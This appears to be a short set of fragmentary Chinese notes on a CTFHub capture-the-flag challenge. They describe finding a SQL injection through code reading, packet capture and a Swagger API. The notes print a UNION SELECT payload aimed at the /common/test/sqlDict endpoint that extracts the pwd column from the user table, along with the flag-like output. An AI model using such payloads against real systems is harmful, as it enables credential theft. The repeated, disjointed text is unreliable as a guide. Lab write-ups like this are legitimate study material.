看目录! 读代码 如何寻找突破口? 存在sql注入 抓包 注入语句写在数据包里 swagger开发接口 login输入用户名密码得到返回数据包 user current 读代码 如何寻找突破口? 存在sql注入 抓包 注入语句写在数据包里 (这个包抓错了,所以没有显示密码) /common/test/sqlDict dbName=myapp?a=’ union select (select pwd from user)# “tableDescribe”:“ctfhub_8978_9176”, “tableName”:“user” ctfhub_4719_19756 swagger开发接口 login输入用户名密码得到返回数据包